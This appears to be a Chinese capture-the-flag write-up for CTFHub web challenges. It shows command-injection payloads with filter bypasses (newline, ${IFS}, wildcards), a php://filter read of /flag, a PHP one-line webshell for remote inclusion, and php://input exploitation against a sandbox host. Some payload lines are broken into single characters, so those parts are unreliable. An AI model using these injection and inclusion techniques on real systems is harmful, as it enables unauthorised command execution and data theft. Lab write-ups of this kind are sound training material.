过滤运算符
过滤了\和&那么尝试;
成功那么将flag cat出来 127.0.0.1;cat flag_27249269530391.php
得到flag
综合过滤练习
这次过滤有点多过滤了&;空格flag,cat,ctfhub 但是没有过滤%0a,%0d,用
I
F
S
取
代
空
格
,
用
{IFS}取代空格,用
IFS取代空格,用*绕过关键词过滤,因为在没有定义的情况下,$*在shell命令执行下为空
回显有一个flag_is_here文件夹 payload:http://challenge-0d5b8ca008f117b9.sandbox.ctfhub.com:10800/?ip=127.0.0.1%0Acd${IFS}fl*ag_is_here%0Als#这里ls是对flag_is_here目录进行操作,所有ls 是在cd flag_is_here执行后在flag_is_here目录下执行,这里拼接的就得用%0a换行符,可以等效&&,不能用%0d,%0d等效于&。
将flag tail出来 http://challenge-0d5b8ca008f117b9.sandbox.ctfhub.com:10800/?ip=127.0.0.1%0Acd
I
F
S
f
l
?
a
g
i
s
h
e
r
e
{IFS}fl*ag_is_here%0Atail
IFSfl?agi?sh?ere{IFS}fl*ag_126912367811026.php#
得到flag
读取源代码
进入环境源码直接给了出来分析代码尝试使用伪协议来读取 ?file=php://filter/read=convert.base64-encode/resource=/flag 将读取出来的字符串进行base64解码
flag出现
远程包含
根据题意我们首先在服务器中创建一个文件夹然后编辑一个一句话木马
python启动一个http服务
然后使用蚁剑连接即可
eval执行
题目一进去就把源码给了出来
测试了一下函数能直接运行
将flag cat出来
文件包含
进入题目点击shell
源代码如上
根据题意文件包含又提供了shell,使用hackbar进行shell的使用
查看根目录发现flag
cat出来
php://input
进入题目题目将源码给了出来并且前六位必须为php:// 根据题目得知需要使用php://input来解题 补充一个知识点
抓包使用php://input漏洞
cat flag
|